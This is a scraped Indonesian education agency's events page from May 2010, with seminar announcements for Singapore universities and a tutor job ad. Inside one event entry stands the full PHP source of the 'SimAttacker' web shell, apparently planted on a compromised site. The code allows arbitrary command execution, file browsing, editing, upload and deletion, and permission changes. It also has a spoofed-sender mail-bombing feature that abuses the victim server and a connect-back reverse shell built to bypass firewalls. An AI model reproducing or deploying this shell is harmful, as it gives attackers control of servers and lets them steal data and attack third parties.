ENGLISH I INDONESIA        Site Map


 

MAY 2010

       
  2010  
  January  
  February  
  March  
  April  
  May  
  2009  
  2008  
  2007  
  2006  
  2005  
     
  Info lebih lanjut tentang
events?
CLICK disini
 
     
  Lihat Gallery Photo Disini!  
 
8 May 2010 - 9 May 2010   //download Files Code
$fdownload=$_GET[\'fdownload\'];
if ($fdownload <> \"\" ){
// path & file name
$path_parts = pathinfo(\"$fdownload\");
$entrypath=$path_parts[\"basename\"];
$name = \"$fdownload\";
$fp = fopen($name, \'rb\');
header(\"Content-Disposition: attachment; filename=$entrypath\");
header(\"Content-Length: \" . filesize($name));
fpassthru($fp);
exit;
}
?>






SimAttacker - Vrsion : 1.0.0 - priv8 4 My friend



error_reporting(E_ERROR | E_WARNING | E_PARSE);

//File Edit
$fedit=$_GET[\'fedit\'];
if ($fedit <> \"\" ){
$fedit=realpath($fedit);
$lines = file($fedit);
echo \"
\";
echo \"

\";
$savefile=$_POST[\'savefile\'];
$filepath=realpath($_POST[\'filepath\']);
if ($savefile <> \"\")
{
$fp=fopen(\"$filepath\",\"w+\");
fwrite ($fp,\"\") ;
fwrite ($fp,$savefile) ;
fclose($fp);
echo \"\";
}
exit();
}
?>
// CHmod - PRimission
$fchmod=$_GET[\'fchmod\'];
if ($fchmod <> \"\" ){
$fchmod=realpath($fchmod);
echo \"


chmod for :$fchmod



Chmod :




\";
$chmod0=$_POST[\'chmod0\'];
if ($chmod0 <> \"\"){
chmod ($fchmod , $chmod0);
}else {
echo \"primission Not Allow change Chmod\";
}
exit();
}
?>


















echo getcwd();
?>
\">
File Manager





CMD
Shell




Fake mail





Connect Back





About


 

 


//*******************************************************
//Start Programs About US
$id=$_GET[\'id\'];

if ($id==\"\") {
echo \"

***************************************************************************

 Iranian Hackers : WWW.SIMORGH-EV.COM

 Programer : Hossein Asgary

 Note : SimAttacker  Have copyright from simorgh security Group

 please : If you find bug or problems in program , tell me by :

 e-mail : admin(at)simorgh-ev(dot)com

Enjoy :) [Only 4 Best Friends ]

***************************************************************************


\";

echo \"OS :\". php_uname();
echo \"
IP :\".
($_SERVER[\'REMOTE_ADDR\']);
echo \"
\";


}
//************************************************************
//cmd-command line
$cmd=$_POST[\'cmd\'];
if($id==\"cmd\"){
$result=shell_exec(\"$cmd\");
echo \"

CMD ExeCute

\" ;
echo \"







\";



}

//********************************************************

//fake mail = Use victim server 4 DOS - fake mail
if ( $id==\"fake-mail\"){
error_reporting(0);
echo \"

Fake Mail- DOS E-mail By Victim Server

\" ;
echo \"

Victim Mail :


Number-Mail :


Comments:





\";
//send Storm Mail
$to=$_POST[\'to\'];
$nom=$_POST[\'nom\'];
$Comments=$_POST[\'Comments\'];
if ($to <> \"\" ){
for ($i = 0; $i < $nom ; $i++){
$from = rand (71,1020000000).\"@\".\"Attacker.com\";
$subject= md5(\"$from\");
mail($to,$subject,$Comments,\"From:$from\");
echo \"$i is ok\";
}
echo \"\";
}
}
//********************************************************

//Connect Back -Firewall Bypass
if ($id==\"cshell\"){
echo \"
Connect back Shell , bypass Firewalls

For user :

nc -l -p 1019





Your IP & BindPort:





\";
$mip=$_POST[\'mip\'];
$bport=$_POST[\'bport\'];
if ($mip <> \"\")
{
$fp=fsockopen($mip , $bport , $errno, $errstr);
if (!$fp){
$result = \"Error: could not open socket connection\";
}
else {
fputs ($fp ,\"\\n*********************************************\\nWelcome T0 SimAttacker 1.00 ready 2 USe\\n*********************************************\\n\\n\");
while(!feof($fp)){
fputs ($fp,\" bash # \");
$result= fgets ($fp, 4096);
$message=`$result`;
fputs ($fp,\"--> \".$message.\"\\n\");
}
fclose ($fp);
}
}
}

//********************************************************
//Spy File Manager
$homedir=getcwd();
$dir=realpath($_GET[\'dir\']).\"/\";
if ($id==\"fm\"){
echo \"

 Home: $homedir
 


 Path:






\";

echo \"











\";
if (is_dir($dir)){
if ($dh=opendir($dir)){
while (($file = readdir($dh)) !== false) {
$fsize=round(filesize($dir . $file)/1024);


echo \"








\";
}
closedir($dh);
}
}
echo \"
File / Folder Name
Size KByte

Download

Edit

Chmod
Delete
\";
if (is_dir($dir.$file))
{
echo \" $file dir\";
}
else {
echo \" $file \";
}
echo \"
\";
if (is_file($dir.$file))
{
echo \"$fsize\";
}
else {
echo \"  \";
}
echo \"
\";
if (is_file($dir.$file)){
if (is_readable($dir.$file)){
echo \"download\";
}else {
echo \"No ReadAble\";
}
}else {
echo \" \";
}
echo \"
\";
if (is_file($dir.$file))
{
if (is_readable($dir.$file)){
echo \"Edit\";
}else {
echo \"No ReadAble\";
}
}else {
echo \" \";
}
echo \"
\";
if (strtoupper(substr(PHP_OS, 0, 3)) === \'WIN\') {
echo \"Dont in windows\";
}
else {
echo \"Chmod\";
}
echo \"
Delete



Send this file:



\";
}
//Upload Files
$rpath=$_GET[\'dir\'];
if ($rpath <> \"\") {
$uploadfile = $rpath.\"/\" . $_FILES[\'userfile\'][\'name\'];
print \"
\";
if (move_uploaded_file($_FILES[\'userfile\'][\'tmp_name\'], $uploadfile)) {
echo \"\";
echo \"\";
}
}
//file deleted
$frpath=$_GET[\'fdelete\'];
if ($frpath <> \"\") {
if (is_dir($frpath)){
$matches = glob($frpath . \'/*.*\');
if ( is_array ( $matches ) ) {
foreach ( $matches as $filename) {
unlink ($filename);
rmdir(\"$frpath\");
echo \"\";
echo \"\";
}
}
}
else{
echo \"\";
unlink (\"$frpath\");
echo \"\";
exit(0);

}


}
?>




Copyright 2004-Simorgh Security

Hossein-Asgari



www.simorgh-ev.com






     
1 May 2010 - 2 May 2010   ERC Institute @ Medan (01 May 10) & Jakarta (02 May 10)

Dibentuk oleh banyak CEO perusahaan besar di Singapura, ERC Institute adalah tempat kuliah S1 dan S2 yang menjanjikan dapatkan pekerjaan setelah lulus kuliah.

Kunjungilah ERC Institute Seminar Gratis dengan topik \"Study with Guarantee Work Placement in Singapore\" yang bertempat di..

MEDAN
Hari & Tanggal : Sabtu, 01 May 2010
Tempat : HSBC Premier Lounge
HSBC Sun Plaza
Jalan H Zainal Arifin, Medan
Jam : 14.00 - 17.00 WIB

JAKARTA
Hari & Tanggal : Minggu, 02 May 2010
Tempat : HSBC Premier Lounge, Lobby Level
HSBC World Trade Center
Jalan Jenderal Sudirman Kav 29 - 31, Jakarta Pusat
Jam : 14.00 - 17.00 WIB

Ingin tau info lebih lengkap dan reservasi ???
Hubungi NexGen Medan Hotline 061 451 4850
Hubungi NexGen Jakarta Hotline 666 00 999 or SMS 0811 960 999

Acara ini didukung oleh HSBC Premier, Provoke dan Pas FM
     
    1
   

SPECIAL EVENTS

APRIL
24 April 2010 - 25 April 2010

Curtin Singapore @ Medan (24 Apr 10) & Jakarta (25 Apr 10)
Curtin University telah membuka kampus internasional di Singapura

Beberapa keunggulan dari Curtin Singapore :
- Fast Track, dapat gelar Bachelor of Commerce dalam waktu 2 tahun
- Pilihan untuk transfer ke kampus Curtin di Perth, Sydney atau Malaysia
- Masih banyak lagi..

Hadirilah Curtin Singapore Seminar Gratis yang bertempat di..

MEDAN
Hari & Tanggal : Sabtu, 24 April 2010
Tempat : HSBC Premier Lounge
HSBC Sun Plaza
Jalan H Zainal Arifin, Medan
Jam : 14.00 - 17.00 WIB

JAKARTA
Hari & Tanggal : Minggu, 25 April 2010
Tempat : HSBC Premier Lounge, Lobby Level
HSBC World Trade Center
Jalan Jenderal Sudirman Kav 29 - 31, Jakarta Pusat
Jam : 14.00 - 17.00 WIB

Ingin tau info lebih lengkap dan reservasi ???
Hubungi NexGen Medan Hotline 061 451 4850
Hubungi NexGen Jakarta Hotline 666 00 999 or SMS 0811 960 999

Acara ini didukung oleh HSBC Premier, Provoke dan Pas FM

FEBRUARY
1 February 2010 - 31 May 2010

JOB VACANCY !!!

NexGen has a vacancies for..
"PART TIME TEACHERS for TOEFL/IELTS/SAT Preparation"

Qualifications :
a. Must have TOEFL/IELTS/SAT teaching experience, at least 1 year
b. Should have Bachelor degree and/or Master degree, preferably from overseas
c. A good command in English both verbal and written
d. Computer literacy
e. Flexible time
f. Personal attention & guidance
g. Have a good communication skills, cooperative and creative
h. Able to provide updated teaching materials

Please send your application with resume, cover letter, educational transcripts, teaching or work experience and recent photograph by the latest on 31 May 2010 to :
Lisa Theresia Soesanto - lisa@nexgeneducation.com